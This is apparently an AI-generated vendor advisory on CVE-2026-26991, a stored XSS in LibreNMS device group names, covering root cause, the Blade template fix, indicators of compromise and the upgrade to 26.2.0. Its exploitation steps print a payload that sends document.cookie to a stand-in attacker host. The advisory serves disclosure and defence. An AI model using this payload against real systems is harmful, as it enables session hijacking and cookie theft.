CVE-2026-26991: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-26991 is a stored Cross-Site Scripting (XSS) vulnerability in LibreNMS affecting the /device-groups endpoint, specifically the name parameter used when creating device groups. The vulnerability exists in all LibreNMS versions prior to 26.2.0. It was published on February 17, 2026, and assigned a CVSS v4 base score of 5.1 (Medium) (GitHub Advisory). Exploitation requires an authenticated attacker with admin privileges and passive user interaction from another user viewing the device groups page (LibreNMS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where the device group name field is stored without sanitizing HTML/JavaScript characters and later rendered unsanitized in the Blade template resources/views/device-group/index.blade.php (GitHub Advisory). Specifically, the device group name was passed directly into the delete_dg() JavaScript function call in the Delete button's onclick attribute without escaping, allowing injected JavaScript to execute when any user triggers the delete confirmation dialog (LibreNMS Commit). The fix moved the group name into a data-group-name HTML attribute (which Blade auto-escapes) and retrieved it via button.dataset.groupName in JavaScript, eliminating the injection point (LibreNMS PR).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any user who views the Device Groups page and interacts with the Delete button for the malicious group. The primary demonstrated impact is session cookie theft — including authentication cookies (CookieAuth) and CSRF tokens (XSRF-TOKEN) — which can be exfiltrated to an attacker-controlled server, enabling session hijacking and unauthorized access to the LibreNMS instance (LibreNMS Advisory). There is no availability impact, but both confidentiality and integrity of the vulnerable and subsequent systems are affected at a low level (GitHub Advisory).

Exploitability

A proof-of-concept exploit is publicly documented in the GitHub Security Advisory, demonstrating cookie exfiltration via a crafted device group name (LibreNMS Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.007% (0th percentile), indicating a very low probability of exploitation in the near term (GitHub Advisory). Exploitation requires admin-level authentication, which significantly limits the attacker pool.

Exploitation steps

  1. Authenticate: Log in to the LibreNMS instance with an account that has admin privileges.
  2. Navigate to Device Groups: Go to Devices > Manage Groups and select "New Device Group".
  3. Inject XSS payload: In the "Name" input field, enter a payload such as:
    12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookie-'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345
    Replace <ATTACKER_IP> with the IP address of an attacker-controlled web server.
  4. Complete group creation: Set any valid Conditional input (e.g., access_points.accesspoint_id) and value (e.g., 1), then click Save.
  5. Wait for victim interaction: When any user (including other admins) navigates to the Device Groups page and clicks the Delete icon for the malicious group and confirms the dialog, the injected JavaScript executes.
  6. Collect exfiltrated cookies: The victim's browser sends an HTTP GET request to the attacker's server containing the user's session cookies, which appear in the attacker's web server logs and can be used for session hijacking (LibreNMS Advisory).

Indicators of compromise

  • Network: Outbound HTTP GET requests from the LibreNMS server's client browsers to unexpected external IP addresses with URL paths beginning with /cookie- followed by URL-encoded cookie data; requests containing CookieAuth, XSRF-TOKEN, or jqCookieJar strings in the URI.
  • Logs: LibreNMS application logs showing creation of a device group with a name containing JavaScript syntax (e.g., single quotes, var , document.cookie, Image(), concat).
  • File System / Database: Device group entries in the LibreNMS database (device_groups table) where the name column contains HTML/JavaScript characters such as <script>, ');, var , or document.cookie.
  • Browser/Proxy Logs: Web proxy or browser logs showing GET requests to non-LibreNMS hosts triggered from the LibreNMS web UI, particularly when a user interacts with the Device Groups delete functionality (LibreNMS Advisory).

Mitigation and workarounds

Update LibreNMS to version 26.2.0 or later, which includes the fix applied in commit 64b31da444369213eb4559ec1c304ebfaa0ba12c (LibreNMS Release, LibreNMS Commit). No official configuration-based workaround is available; the only remediation is upgrading to the patched version. As a defense-in-depth measure, restrict admin-level access to trusted users only, implement a Content Security Policy (CSP) header to limit script execution origins, and monitor device group names for suspicious content (GitHub Advisory).

Community reactions

The vulnerability was reported by security researcher awoffsec (Finder) and coordinated by wsparks-vc, with the fix authored by LibreNMS maintainer murrant (LibreNMS Advisory). The fix was part of a broader security release in LibreNMS 26.2.0 that addressed multiple XSS issues simultaneously (port group delete XSS, alert rule XSS, reflected XSS), suggesting a coordinated security audit (LibreNMS Release). No significant broader media coverage or notable social media discussion has been identified beyond the standard vulnerability database entries.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management